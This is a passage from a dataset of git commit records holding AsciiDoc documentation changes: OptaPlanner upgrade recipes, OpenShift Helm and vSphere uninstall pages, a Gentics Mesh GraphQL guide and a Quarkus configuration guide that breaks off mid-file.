(ScoreDirector<VehicleRoutingSolution> scoreDirector = scoreDirectorFactory.buildScoreDirector()) {\n ...\n }\n----\n\n\n== From 7.3.0.Final to 7.4.0.Final\n\n[.upgrade-recipe-minor]\n=== `movableEntitySelectionFilter` is now inherited\n\nAn entity's `movableEntitySelectionFilter` is now inherited by child entities.\nThe workaround of configuring the filter twice, is now obsolete.\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningEntity(movableEntitySelectionFilter = ParentFilter.class)\npublic class Animal {\n ...\n}\n\n@PlanningEntity(movableEntitySelectionFilter = ParentFilter.class)\npublic class Dog extends Animal {\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningEntity(movableEntitySelectionFilter = ParentFilter.class)\npublic class Animal {\n ...\n}\n\n@PlanningEntity()\npublic class Dog extends Animal {\n ...\n}\n----\n\n\n== From 7.4.0.Final to 7.5.0.Final\n\n[.upgrade-recipe-minor]\n=== `Indictment`: natural comparison changed\n\nAn `Indictment` is now naturally sorted by its justification.\nTo sort it based on its score, use `IndictmentScoreTotalComparator`.\n\nBefore in `*.java`:\n[source, java]\n----\nCollections.sort(indictmentList);\n----\n\nAfter in `*.java`:\n[source, java]\n----\nCollections.sort(indictmentList, new IndictmentScoreTotalComparator());\n----\n\n\n== From 7.5.0.Final to 7.6.0.Final\n\n[.upgrade-recipe-minor]\n=== `PlannerBenchmark`: new method `benchmarkAndShowReportInBrowser()`\n\nIf you're running local benchmarks, this new method will save time by opening the report automatically.\n\nBefore in `*.java`:\n[source, java]\n----\nplannerBenchmark.benchmark();\n\/\/ Afterwards manually find the benchmark dir to open the report\n----\n\nAfter in `*.java`:\n[source, java]\n----\nplannerBenchmark.benchmarkAndShowReportInBrowser();\n----\n\n[.upgrade-recipe-minor]\n=== `ConstraintMatchAwareIncrementalScoreCalculator`: `Indictment.addConstraintMatch()` changed\n\nThis only applies if you're extending `ConstraintMatchAwareIncrementalScoreCalculator`\nand you do not simply return `null` in `getIndictmentMap()`.\n\nThe method `Indictment.addConstraintMatch(ConstraintMatch)` now returns void instead of a boolean.\nIf the same `ConstraintMatch` is added twice, it now fails fast instead of returning false.\nIf the same `ConstraintMatch` has the same justification twice,\nit must now be added to that justification's `Indictment` only once.\n\n\n== From 7.6.0.Final to 7.7.0.Final\n\n[.upgrade-recipe-major]\n=== Replace `movableEntitySelectionFilter` with `@PlanningPin` when possible\n\nIn many cases, the complex use of a `movableEntitySelectionFilter` to pin down planning entities\ncan by simplified by a `@PlanningPin` annotation on a field or method\nthat returns true if the entity is immovable.\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningEntity(movableEntitySelectionFilter = MovableLectureSelectionFilter.class)\npublic class Lecture {\n private boolean pinned;\n\n public boolean isPinned() {\n return pinned;\n }\n}\n----\n\n[source, java]\n----\npublic class MovableLectureSelectionFilter implements SelectionFilter<CourseSchedule, Lecture> {\n\n @Override\n public boolean accept(ScoreDirector<CourseSchedule> scoreDirector, Lecture lecture) {\n return !lecture.isPinned();\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningEntity\npublic class Lecture {\n private boolean pinned;\n\n @PlanningPin\n public boolean isPinned() {\n return pinned;\n }\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== Jackson integration: use `OptaPlannerJacksonModule`\n\nInstead of using `@JsonSerialize` and `@JsonDeserialize` Jackson annotations on every `Score` field,\njust register `OptaPlannerJacksonModule` once instead.\n\nBefore in `*.java`:\n\n[source, java]\n----\n ObjectMapper objectMapper = new ObjectMapper();\n----\n\n[source, java]\n----\n@PlanningSolution\npublic class MySolution {\n\n @JsonSerialize(using = ScoreJacksonJsonSerializer.class)\n @JsonDeserialize(using = HardSoftScoreJacksonJsonDeserializer.class)\n private HardSoftScore score;\n\n ...\n}\n----\n\nAfter in `*.java`:\n\n[source, java]\n----\n ObjectMapper objectMapper = new ObjectMapper();\n objectMapper.registerModule(OptaPlannerJacksonModule.createModule());\n----\n\n[source, java]\n----\n@PlanningSolution\npublic class MySolution {\n\n private HardSoftScore score;\n\n ...\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== Jackson integration: replace `ScoreJacksonJsonSerializer`\n\nIf you do prefer to use `@JsonSerialize` and `@JsonDeserialize` Jackson annotations,\ninstead of registering `OptaPlannerJacksonModule`,\nreplace `ScoreJacksonJsonSerializer` with a specific serializer,\nsuch as `HardSoftScoreJacksonJsonSerializer`.\nThis won't affect the json output.\n\n`ScoreJacksonJsonSerializer` is deprecated.\n\nBefore in `*.java`:\n[source, java]\n----\n@JsonSerialize(using = ScoreJacksonJsonSerializer.class)\n@JsonDeserialize(using = HardSoftScoreJacksonJsonDeserializer.class)\nprivate HardSoftScore score;\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@JsonSerialize(using = HardSoftScoreJacksonJsonSerializer.class)\n@JsonDeserialize(using = HardSoftScoreJacksonJsonDeserializer.class)\nprivate HardSoftScore score;\n----\n\n\n== From 7.7.0.Final to 7.8.0.Final\n\n\n[.upgrade-recipe-minor]\n=== Partitioned Search: `threadFactoryClass` moved\n\nNow that `<solver>` directly supports a `<threadFactoryClass>` element,\nthe `<threadFactoryClass>` element under `<partitionedSearch>` has been deprecated.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <solver>\n ...\n <partitionedSearch>\n <threadFactoryClass>...MyAppServerThreadFactory<\/threadFactoryClass>\n ...\n <\/partitionedSearch>\n <\/solver>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <solver>\n <threadFactoryClass>...MyAppServerThreadFactory<\/threadFactoryClass>\n ...\n <partitionedSearch>\n ...\n <\/partitionedSearch>\n <\/solver>\n----\n\n\n[.upgrade-recipe-minor]\n=== `ConstraintMatchTotal` and `Indictment`: `getScoreTotal()` renamed to `getScore()`\n\nThe `getScoreTotal()` methods on `ConstraintMatchTotal` and `Indictment`\nhave been deprecated and replaced by `getScore()`.\nThose deprecated methods will be removed in 8.0.\n\nBefore in `*.java`:\n[source, java]\n----\nScore score = constraintMatchTotal.getScoreTotal();\n----\n\nAfter in `*.java`:\n[source, java]\n----\nScore score = constraintMatchTotal.getScore();\n----\n\nBefore in `*.java`:\n[source, java]\n----\nScore score = indictment.getScoreTotal();\n----\n\nAfter in `*.java`:\n[source, java]\n----\nScore score = indictment.getScore();\n----\n\n\n[.upgrade-recipe-minor]\n=== `IndictmentScoreTotalComparator` renamed to `IndictmentScoreComparator`\n\nThe comparator `IndictmentScoreTotalComparator` has been deprecated\nand replaced by `IndictmentScoreComparator`.\nThe deprecated class will be removed in 8.0.\n\n\nBefore in `*.java`:\n[source, java]\n----\nindictmentList.sort(new IndictmentScoreTotalComparator());\n----\n\nAfter in `*.java`:\n[source, java]\n----\nindictmentList.sort(new IndictmentScoreComparator());\n----\n\n\n== From 7.10.0.Final to 7.11.0.Final\n\n\n[.upgrade-recipe-major]\n=== Chained ChangeMove: cache type `PHASE` no longer supported\n\nTo work correctly with multithreaded solving,\n`ChainedChangeMove` and `ChainedSwapMove` aren't `PHASE` cacheable any longer.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <changeMoveSelector><!-- On at least 1 chained variable -->\n <cacheType>PHASE<\/cacheType>\n ...\n <\/changeMoveSelector>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <changeMoveSelector>\n <cacheType>STEP<\/cacheType>\n ...\n <\/changeMoveSelector>\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b5456440972876da957727b26d83438834c98129","subject":"Removed TP note","message":"Removed TP note\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"cli_reference\/helm_cli\/getting-started-with-helm-on-openshift-container-platform.adoc","new_file":"cli_reference\/helm_cli\/getting-started-with-helm-on-openshift-container-platform.adoc","new_contents":"[id=\"getting-started-with-helm-on-openshift\"]\n\n= Getting started with Helm 3 on {product-title}\ninclude::modules\/common-attributes.adoc[]\n:context: getting-started-with-helm-on-openshift\n\ntoc::[]\n\ninclude::modules\/helm-understanding-helm.adoc[leveloffset=+1]\n\ninclude::modules\/helm-installing-helm.adoc[leveloffset=+1]\n\ninclude::modules\/helm-installing-a-helm-chart-on-an-openshift-cluster.adoc[leveloffset=+1]\n\ninclude::modules\/helm-creating-a-custom-helm-chart-on-openshift.adoc[leveloffset=+1]\n\n","old_contents":"[id=\"getting-started-with-helm-on-openshift\"]\n\n= Getting started with Helm 3 on {product-title}\ninclude::modules\/common-attributes.adoc[]\n:context: getting-started-with-helm-on-openshift\n\ntoc::[]\n\n:FeatureName: Helm 3 for {product-title}\ninclude::modules\/technology-preview.adoc[leveloffset=+1]\n\ninclude::modules\/helm-understanding-helm.adoc[leveloffset=+1]\n\ninclude::modules\/helm-installing-helm.adoc[leveloffset=+1]\n\ninclude::modules\/helm-installing-a-helm-chart-on-an-openshift-cluster.adoc[leveloffset=+1]\n\ninclude::modules\/helm-creating-a-custom-helm-chart-on-openshift.adoc[leveloffset=+1]\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1ff6d064aa90c9cf14b9ddbc49dd19203351bda7","subject":"BZ1891361: Added note block about vSphere volume is not deleted after the cluster is destroyed","message":"BZ1891361: Added note block about vSphere volume is not deleted after the cluster is destroyed\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"installing\/installing_vsphere\/uninstalling-cluster-vsphere-installer-provisioned.adoc","new_file":"installing\/installing_vsphere\/uninstalling-cluster-vsphere-installer-provisioned.adoc","new_contents":":_content-type: ASSEMBLY\n[id=\"uninstalling-cluster-vsphere-installer-provisioned\"]\n= Uninstalling a cluster on vSphere that uses installer-provisioned infrastructure\ninclude::_attributes\/common-attributes.adoc[]\n:context: uninstalling-cluster-vsphere-installer-provisioned\n\ntoc::[]\n\nYou can remove a cluster that you deployed in your VMware vSphere instance by using installer-provisioned infrastructure.\n\n[NOTE]\n====\nWhen you run the `openshift-install destroy cluster` command to uninstall {product-title}, vSphere volumes are not automatically deleted. The cluster administrator must manually find the vSphere volumes and delete them.\n====\n\ninclude::modules\/installation-uninstall-clouds.adoc[leveloffset=+1]\n","old_contents":":_content-type: ASSEMBLY\n[id=\"uninstalling-cluster-vsphere-installer-provisioned\"]\n= Uninstalling a cluster on vSphere that uses installer-provisioned infrastructure\ninclude::_attributes\/common-attributes.adoc[]\n:context: uninstalling-cluster-vsphere-installer-provisioned\n\ntoc::[]\n\nYou can remove a cluster that you deployed in your VMware vSphere instance by using installer-provisioned infrastructure.\n\ninclude::modules\/installation-uninstall-clouds.adoc[leveloffset=+1]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"94fd1a1c189f609f66c0177ff5d7c9dea1adcf66","subject":"fixed typo","message":"fixed typo\n","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"doc\/src\/main\/docs\/graphql.asciidoc","new_file":"doc\/src\/main\/docs\/graphql.asciidoc","new_contents":"---\ntitle: GraphQL\n---\n\n:icons: font\n:source-highlighter: prettify\n\nGentics Mesh is also able to process http:\/\/graphql.org\/[GraphQL] queries. You can use GraphQL to directly specify what fields should be retrieved and retrieve deeply nested data sets.\nInternally, Gentics Mesh will resolve your query and traverse your content graph to fetch only the data you specified.\n\nThe GraphQL API can thus be used to prepare a single request which returns all data needed to render a specific page. \n\nPossible use cases are:\n\n* Loading multiple nodes using the webroot path.\n* Generating a custom navigation which only includes the information you need.\n* Invoking multiple search requests to find a set of specific nodes.\n* Resolve links within the content of a node.\n* Load users, roles, groups\n* Load tags, tag families, schema and microschema information\n\n== Live Examples\n\nIf you want to learn more about the http:\/\/graphql.org\/learn\/queries\/[GraphQL syntax take a look at the good documentation].\n\n=== Loading current user\n\ninclude::content\/docs\/examples\/graphql\/user-tiny-query[]\n\n=== Loading basic fields of a node \n\ninclude::content\/docs\/examples\/graphql\/node-field-query[]\n\n=== Loading a node via uuid\n\ninclude::content\/docs\/examples\/graphql\/node-uuid-query[]\n\n=== Loading referenced fields of a node\n\nNodes can be linked together in various way. One way is the regular parent-child relationship. Another way is by using node fields. The demo data contains vehicles which each is linked to a vehicle image. In order to present the vehicle we also need to retrieve the image path and other information.\n\ninclude::content\/docs\/examples\/graphql\/node-reference-query[]\n\n[[search]]\n=== Invoking a search query to find specific nodes\n\nThe search query is an escaped JSON object which represents the a regular https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/2.4\/_executing_searches.html[Elasticsearch query].\n\ninclude::content\/docs\/examples\/graphql\/node-search-query[]\n\n+++\n<a href=\"https:\/\/demo.getmesh.io\/api\/v1\/demo\/graphql\/browser\/#query=query%20stuff(%24esQuery%3A%20String)%20%7B%0A%20%20nodes(query%3A%20%24esQuery)%20%7B%0A%20%20%20%20elements%20%7B%0A%20%20%20%20%20%20uuid%0A%20%20%20%20%20%20fields%20%7B%0A%20%20%20%20%20%20%20%20...%20on%20vehicle%20%7B%0A%20%20%20%20%20%20%20%20%20%20slug%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%20%20totalCount%0A%20%20%7D%0A%7D%0A&variables=%7B%0A%20%20%22esQuery%22%3A%20%20%22%7B%5C%22query%5C%22%3A%7B%5C%22query_string%5C%22%3A%7B%5C%22query%5C%22%3A%5C%22car%5C%22%7D%7D%7D%22%0A%7D&operationName=stuff\" target=\"_blank\">Example using variables<\/a>\n+++\n\n=== Using pagination\n\nSimilar to the REST API a value based pagination system is implemented. \n\ninclude::content\/docs\/examples\/graphql\/node-page-query[]\n\n=== Multilanguage support\n\nThe node will automatically be loaded in the language which matches up with the provided webroot path. A webroot path which points to an english node will yield the english content. Subsequent loading a node using the german path will yield the german content. It is important to node that Gentics Mesh tries to stick to a language as much as possible. Loading additional referenced nodes of an german node via either the children or a node field will return the german content if such content could be found. The fallback to the configured default language will be applied if no other matching content found be found. Null will be returned if this also fails.\n\nIt is possible to load a found node in a different language using the `node` field as shown in the example.\n\ninclude::content\/docs\/examples\/graphql\/node-multilang-query[]\n\n== Filtering\nAny time a node list is requested, you can provide a filter object as a parameter to narrow down the result.\n\nHere are a few examples:\n\n=== Loading nodes from a specific schema\nThe `SchemaFilter` matches nodes with a specific schema name.\ninclude::content\/docs\/examples\/graphql\/filtering\/root-folders[]\n\n=== Filter nodes with regular expressions\nThe `StringFilter` offers various ways to filter strings. One example is regular expressions.\nIn this example we get all nodes with the schema `vehicle`. We check if their name field ends with a number.\ninclude::content\/docs\/examples\/graphql\/filtering\/vehicles-regex[]\n\n=== Combining different filters\nCombine multiple filters to further narrow down your results. One example is the `OrFilter`.\nWe get the same nodes as in the previous example. Additionally we also get all vehicles that have a price lower than 200.000.\ninclude::content\/docs\/examples\/graphql\/filtering\/vehicles-or[]\n\n=== Filtering limitations\nWhen filtering by fields of a node, it is currently only possible to filter by fields of the following types:\n\n* `string`\n* `html`\n* `number`\n* `date`\n* `boolean`\n\n.A note on GraphiQL\n[TIP]\nEdit the above examples and experiment with the API.\nUse the GraphiQL autocompletion (press `ctrl`+`space` while typing your query) to see what options are available.\nCheck the documentation explorer (in the top-right corner) to find out more details.\n\n.Try it in your own installation\n[TIP]\nYour instance of Gentics Mesh comes with the <<_graphiql_browser>> as well.\n\n=== Comparison to Elasticsearch\nMany tasks can be done by both the search and the filtering feature. Here are a few tips that help you decide which technology is suited best for your needs:\n\n* GraphQL filtering is independent of Elasticsearch. If you don't want to use Elasticsearch, GraphQL filtering is still available.\n* GraphQL filtering is faster when dealing with small datasets. There is less overhead compared to Elasticsearch. GraphQL filtering iterates over the source set of elements and applies the filter until enough nodes have been found for the response.\n* Elasticsearch is faster when dealing with large datasets, because it uses an index to access its documents.\n* Elasticsearch is better suited for full text search queries from an end user because you can precisely tune the index to your requirements.\n\n== GraphiQL Browser\n\nWe have integrated the interactive https:\/\/github.com\/graphql\/graphiql[GraphiQL]footnote:[https:\/\/github.com\/graphql\/graphiql[GraphiQL] is owned and developed by Facebook Inc. Usage is subject to the https:\/\/github.com\/gentics\/mesh\/blob\/dev\/verticles\/graphql\/src\/main\/resources\/graphiql\/LICENSE[LICENSE AGREEMENT For GraphiQL software].] browser into Gentics Mesh so you can easily play with the API.\n\n.Try the example\n[TIP]\nhttps:\/\/demo.getmesh.io\/api\/v1\/demo\/graphql\/browser\/[Live Demo]\n\nAlternatively, you can download Gentics Mesh and test the API locally.\nOnce authenticated you can access the interactive GraphiQL browser at ```\/api\/v1\/:projectName\/graphql\/browser\/``` .\n\nNOTE: The GraphiQL browser currently does not support the `branch` or `version` query parameter.\n\n== Limitations\n\n* At the moment, the GraphQL API can currently only be used for read-only operations. Modifying data with via mutations is currently not supported.\n* GraphQL queries are restricted to a specific project. It is not possible to query data across multiple projects.\n* GraphQL queries are restricted to a specific project branch. The scope of the branch can be changed by adding the `?branch` query parameter.\n","old_contents":"---\ntitle: GraphQL\n---\n\n:icons: font\n:source-highlighter: prettify\n\nGentics Mesh is also able to process http:\/\/graphql.org\/[GraphQL] queries. You can use GraphQL to directly specify what fields should be retrieved and retrieve deeply nested data sets.\nInternally, Gentics Mesh will resolve your query and traverse your content graph to fetch only the data you specified.\n\nThe GraphQL API can thus be used to prepare a single request which returns all data needed to render a specific page. \n\nPossible use cases are:\n\n* Loading multiple nodes using the webroot path.\n* Generating a custom navigation which only includes the information you need.\n* Invoking multiple search requests to find a set of specific nodes.\n* Resolve links within the content of a node.\n* Load users, roles, groups\n* Load tags, tag families, schema and microschema information\n\n== Live Examples\n\nIf you want to learn more about the http:\/\/graphql.org\/learn\/queries\/[GraphQL syntax take a look at the good documentation].\n\n=== Loading current user\n\ninclude::content\/docs\/examples\/graphql\/user-tiny-query[]\n\n=== Loading basic fields of a node \n\ninclude::content\/docs\/examples\/graphql\/node-field-query[]\n\n=== Loading a node via uuid\n\ninclude::content\/docs\/examples\/graphql\/node-uuid-query[]\n\n=== Loading referenced fields of a node\n\nNodes can be linked together in various way. One way is the regular parent-child relationship. Another way is by using node fields. The demo data contains vehicles which each is linked to a vehicle image. In order to present the vehicle we also need to retrieve the image path and other information.\n\ninclude::content\/docs\/examples\/graphql\/node-reference-query[]\n\n[[search]]\n=== Invoking a search query to find specific nodes\n\nThe search query is an escaped JSON object which represents the a regular https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/2.4\/_executing_searches.html[Elasticsearch query].\n\ninclude::content\/docs\/examples\/graphql\/node-search-query[]\n\n+++\n<a href=\"https:\/\/demo.getmesh.io\/api\/v1\/demo\/graphql\/browser\/#query=query%20stuff(%24esQuery%3A%20String)%20%7B%0A%20%20nodes(query%3A%20%24esQuery)%20%7B%0A%20%20%20%20elements%20%7B%0A%20%20%20%20%20%20uuid%0A%20%20%20%20%20%20fields%20%7B%0A%20%20%20%20%20%20%20%20...%20on%20vehicle%20%7B%0A%20%20%20%20%20%20%20%20%20%20slug%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%20%20totalCount%0A%20%20%7D%0A%7D%0A&variables=%7B%0A%20%20%22esQuery%22%3A%20%20%22%7B%5C%22query%5C%22%3A%7B%5C%22query_string%5C%22%3A%7B%5C%22query%5C%22%3A%5C%22car%5C%22%7D%7D%7D%22%0A%7D&operationName=stuff\" target=\"_blank\">Example using variables<\/a>\n+++\n\n=== Using pagination\n\nSimilar to the REST API a value based pagination system is implemented. \n\ninclude::content\/docs\/examples\/graphql\/node-page-query[]\n\n=== Multilanguage support\n\nThe node will automatically be loaded in the language which matches up with the provided webroot path. A webroot path which points to an english node will yield the english content. Subsequent loading a node using the german path will yield the german content. It is important to node that Gentics Mesh tries to stick to a language as much as possible. Loading additional referenced nodes of an german node via either the children or a node field will return the german content if such content could be found. The fallback to the configured default language will be applied if no other matching content found be found. Null will be returned if this also fails.\n\nIt is possible to load a found node in a different language using the `node` field as shown in the example.\n\ninclude::content\/docs\/examples\/graphql\/node-multilang-query[]\n\n== Filtering\nAny time a node list is requested, you can provide a filter object as a parameter to narrow down the result.\n\nHere are a few examples:\n\n=== Loading nodes from a specific schema\nThe `SchemaFilter` matches nodes with a specific schema name.\ninclude::content\/docs\/examples\/graphql\/filtering\/root-folders[]\n\n=== Filter nodes with regular expressions\nThe `StringFilter` offers various ways to filter strings. One example is regular expressions.\nIn this example we get all nodes with the schema `vehicle`. We check if their name field ends with a number.\ninclude::content\/docs\/examples\/graphql\/filtering\/vehicles-regex[]\n\n=== Combining different filters\nCombine multiple filters to further narrow down your results. One example is the `OrFilter`.\nWe get the same nodes as in the previous example. Additionally we also get all vehicles that have a price lower than 200.000.\ninclude::content\/docs\/examples\/graphql\/filtering\/vehicles-or[]\n\n=== Filtering limitations\nWhen filtering by fields of a node, it is currently only possible to filter by fields of the following types:\n\n* `string`\n* `html`\n* `number`\n* `date`\n* `boolean`\n\n.A note on GraphiQL\n[TIP]\nEdit the above examples and experiment with the API.\nUse the GraphiQL autocompletion (press `ctrl`+`space` while typing your query) to see what options are available.\nCheck the documentation explorer (in the top-right corner) to find out more details.\n\n.Try it in your own installation\n[TIP]\nYour instance of Gentics Mesh comes with the <<_graphiql_browser>> as well.\n\n=== Comparison to Elasticsearch\nMany tasks can be done by both the search and the filtering feature. Here are a few tips that help you decide which technology is suited best for your needs:\n\n* GraphQL filtering is independent of Elasticsearch. If you don't want to use Elasticsearch, GraphQL filtering is still available.\n* GraphQL filtering is faster when dealing with small datasets. There is less overhead compared to Elasticsearch. GraphQL filtering iterates over the source set of elements and applies the filter until enough nodes have been found for the response.\n* Elasticsearch is faster when dealing with large datasets, because it uses an index to access its documents.\n* Elasticsearch is better suited for full text search queries from an end user because you can precisely tune the index to your requirements.\n\n== GraphiQL Browser\n\nWe have integrated the interactive https:\/\/github.com\/graphql\/graphiql[GraphiQL]footnote:[https:\/\/github.com\/graphql\/graphiql[GraphiQL] is owned and developed by Facebook Inc. Usage is subject to the https:\/\/github.com\/gentics\/mesh\/blob\/dev\/verticles\/graphql\/src\/main\/resources\/graphiql\/LICENSE[LICENSE AGREEMENT For GraphiQL software].] browser into Gentics Mesh so you can easily play with the API.\n\n.Try the example\n[TIP]\nhttps:\/\/demo.getmesh.io\/api\/v1\/demo\/graphql\/browser\/[Live Demo]\n\nAlternatively, you can download Gentics Mesh and test the API locally.\nOnce authenticated you can access the interactive GraphiQL browser at ```\/api\/v1\/:projectName\/graphql\/browser\/``` .\n\nNOTE: The GraphiQL browser currently does not support the `branch`` or `version` query parameter.\n\n== Limitations\n\n* At the moment, the GraphQL API can currently only be used for read-only operations. Modifying data with via mutations is currently not supported.\n* GraphQL queries are restricted to a specific project. It is not possible to query data across multiple projects.\n* GraphQL queries are restricted to a specific project branch. The scope of the branch can be changed by adding the `?branch` query parameter.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"569487315dce801c972cd5b95048623191ecf447","subject":"Extend Guide on .env Profiles","message":"Extend Guide on .env Profiles\n\n- Note .env Priority to application.properties\n- Add Example of .env File With Profile\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/config.adoc","new_file":"docs\/src\/main\/asciidoc\/config.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Configuring Your Application\n\ninclude::.\/attributes.adoc[]\n\nHardcoded values in your code are a _no go_ (even if we all did it at some point ;-)).\nIn this guide, we learn how to configure your application.\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* between 5 and 10 minutes\n* an IDE\n* JDK 1.8+ installed with `JAVA_HOME` configured appropriately\n* Apache Maven {maven-version}\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `config-quickstart` {quickstarts-tree-url}\/config-quickstart[directory].\n\n== Creating the Maven project\n\nFirst, we need a new project. Create a new project with the following command:\n\n[source,shell,subs=attributes+]\n----\nmvn io.quarkus:quarkus-maven-plugin:{quarkus-version}:create \\\n -DprojectGroupId=org.acme \\\n -DprojectArtifactId=config-quickstart \\\n -DclassName=\"org.acme.config.GreetingResource\" \\\n -Dpath=\"\/greeting\"\ncd config-quickstart\n----\n\nIt generates:\n\n* the Maven structure\n* a landing page accessible on `http:\/\/localhost:8080`\n* example `Dockerfile` files for both `native` and `jvm` modes\n* the application configuration file\n* an `org.acme.config.GreetingResource` resource\n* an associated test\n\n== Injecting configuration value\n\nQuarkus uses https:\/\/microprofile.io\/project\/eclipse\/microprofile-config[MicroProfile Config] to inject the configuration in the application.\nThe injection uses the `@ConfigProperty` annotation.\n\n[source,java]\n----\n@ConfigProperty(name = \"greeting.message\")\nString message;\n----\n\nNOTE: When injecting a configured value, you can use `@Inject @ConfigProperty` or just `@ConfigProperty`.\nThe `@Inject` annotation is not necessary for members annotated with `@ConfigProperty`, a behavior which differs from https:\/\/microprofile.io\/project\/eclipse\/microprofile-config[MicroProfile Config]\n\nEdit the `org.acme.config.GreetingResource`, and introduce the following configuration properties:\n\n[source,java]\n----\n@ConfigProperty(name = \"greeting.message\") <1>\nString message;\n\n@ConfigProperty(name = \"greeting.suffix\", defaultValue=\"!\") <2>\nString suffix;\n\n@ConfigProperty(name = \"greeting.name\")\nOptional<String> name; <3>\n----\n<1> If you do not provide a value for this property, the application startup fails with `javax.enterprise.inject.spi.DeploymentException: No config value of type [class java.lang.String] exists for: greeting.message`.\n<2> The default value is injected if the configuration does not provide a value for `greeting.suffix`.\n<3> This property is optional - an empty `Optional` is injected if the configuration does not provide a value for `greeting.name`.\n\nNow, modify the `hello` method to use the injected properties:\n\n[source,java]\n----\n@GET\n@Produces(MediaType.TEXT_PLAIN)\npublic String hello() {\n return message + \" \" + name.orElse(\"world\") + suffix;\n}\n----\n\n\n== Create the configuration\n\nBy default, Quarkus reads `application.properties`.\nEdit the `src\/main\/resources\/application.properties` with the following content:\n\n[source,shell]\n----\n# Your configuration properties\ngreeting.message = hello\ngreeting.name = quarkus\n----\n\nOnce set, check the application with:\n\n[source,shell]\n----\n$ curl http:\/\/localhost:8080\/greeting\nhello quarkus!\n----\n\nTIP: If the application requires configuration values and these values are not set, an error is thrown.\nSo you can quickly know when your configuration is complete.\n\n== Update the test\n\nWe also need to update the functional test to reflect the changes made to the endpoint.\nEdit the `src\/test\/java\/org\/acme\/config\/GreetingResourceTest.java` file and change the content of the `testHelloEndpoint` method to:\n\n\n[source,java]\n----\npackage org.acme.config;\n\nimport io.quarkus.test.junit.QuarkusTest;\nimport org.junit.jupiter.api.Test;\n\nimport static io.restassured.RestAssured.given;\nimport static org.hamcrest.CoreMatchers.is;\n\n@QuarkusTest\npublic class GreetingResourceTest {\n\n @Test\n public void testHelloEndpoint() {\n given()\n .when().get(\"\/greeting\")\n .then()\n .statusCode(200)\n .body(is(\"hello quarkus!\")); \/\/ Modified line\n }\n\n}\n----\n\n== Package and run the application\n\nRun the application with: `.\/mvnw compile quarkus:dev`.\nOpen your browser to http:\/\/localhost:8080\/greeting.\n\nChanging the configuration file is immediately reflected.\nYou can add the `greeting.suffix`, remove the other properties, change the values, etc.\n\nAs usual, the application can be packaged using `.\/mvnw clean package` and executed using the `-runner.jar` file.\nYou can also generate the native executable with `.\/mvnw clean package -Pnative`.\n\n== Programmatically access the configuration\n\nYou can access the configuration programmatically.\nIt can be handy to achieve dynamic lookup, or retrieve configured values from classes that are neither CDI beans or JAX-RS resources.\n\nYou can access the configuration programmatically using `org.eclipse.microprofile.config.ConfigProvider.getConfig()` such as in:\n\n[source,java]\n----\nString databaseName = ConfigProvider.getConfig().getValue(\"database.name\", String.class);\nOptional<String> maybeDatabaseName = ConfigProvider.getConfig().getOptionalValue(\"database.name\", String.class);\n----\n\n== Using @ConfigProperties\n\nAs an alternative to injecting multiple related configuration values in the way that was shown in the previous example,\nusers can also use the `@io.quarkus.arc.config.ConfigProperties` annotation to group these properties together.\n\nFor the greeting properties above, a `GreetingConfiguration` class could be created like so:\n\n[source,java]\n----\npackage org.acme.config;\n\nimport io.quarkus.arc.config.ConfigProperties;\nimport java.util.Optional;\n\n@ConfigProperties(prefix = \"greeting\") <1>\npublic class GreetingConfiguration {\n\n private String message;\n private String suffix = \"!\"; <2>\n private Optional<String> name;\n\n public String getMessage() {\n return message;\n }\n\n public void setMessage(String message) {\n this.message = message;\n }\n\n public String getSuffix() {\n return suffix;\n }\n\n public void setSuffix(String suffix) {\n this.suffix = suffix;\n }\n\n public Optional<String> getName() {\n return name;\n }\n\n public void setName(Optional<String> name) {\n this.name = name;\n }\n}\n----\n<1> `prefix` is optional. If not set then the prefix to be used will be determined by the class name. In this case it would still be `greeting` (since the `Configuration` suffix is removed). If the class were named `GreetingExtraConfiguration` then the resulting default prefix would be `greeting-extra`.\n<2> `!` will be the default value if `greeting.suffix` is not set\n\nThis class could then be injected into the `GreetingResource` using the familiar CDI `@Inject` annotation like so:\n\n[source,java]\n----\n@Inject\nGreetingConfiguration 